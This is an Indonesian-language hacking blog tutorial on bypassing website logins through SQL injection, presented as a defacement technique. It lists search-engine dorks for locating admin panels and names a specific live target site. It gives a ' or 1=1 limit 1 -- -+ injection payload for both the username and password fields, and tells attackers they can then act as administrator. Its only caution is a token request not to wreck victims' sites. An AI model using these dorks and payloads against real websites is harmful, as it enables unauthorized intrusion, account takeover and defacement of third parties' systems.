Apa Itu Bypass Sql Login ?

Bypass sql login adalah sebuah teknik deface yang banyak digunakan untuk menerobos system login dengan memanfaatkan bug SQL yang ada di database website tersebut. Dari celah tersebut,sang attacker bisa saja merubah,menambah,menghapus data data website / database,memberi backdoor (shell),takeover account dll. Yap celah ini memang sangat critical bagi para developer,jadi sebisa mungkin disarankan untuk menutup bug ini.

Bagaimana Cara Bypass SQL Login ?

Setelah membaca pengertian bypass sql login diatas,mari kita lanjut membahas bagaimana cara melakukan bypass sql login ini. Langsung saja jangan banyak basa basi kwwkw berikut adalah caranya : 

#dork : 

  • inurl:manager intitle:Admin Panel
  • inurl:/admin2/ ext:php
  • inurl:/admin/ ext:php
  • inurl:/adminpanel/ext:php
  • inurl:/admin_panel/
#exploit :

1. Cari website atau target melalui Dork diatas menggunakan Search Engine seperti Google,Bing,dll.

Live target:

http://preprojects.com/hostfriendz/int/index.php


2. Jika sudah memilih target yang vuln silahkan anda coba login dengan user pass ini :

user : ‘ or 1=1 limit 1 — -+
pass : ‘ or 1=1 limit 1 — -+

Nah jika website yang kita target ternyata vuln,maka dengan username dan password tersebut kita akan langsung masuk ke dashboard admin/user,dan kita bisa melakukan berbagai macam hal layaknya seorang admin pada umumnya.


Bagaimana ? Cara bypass sql login ini termasuk mudah digunakan bagi para attacker untuk masuk dan menerobos system suatu website. Tapi sebaliknya,bagi para developer atau admin website ini adalah cara yang sangat berbahaya dan sangat critical. 

Jadi pesan saya untuk para attacker,jika kalian mau deface menggunakan teknik ini,TOLONG JANGAN DIRUSAK WEBSITE KORBAN,setidaknya kalau mau iseng,kalian WAJIB BACKUP WEBSITE tersebut terlebih dahulu,ingat prinsip Etchical Hacker Indonesia

Thanks For Reading,and Happy Hacking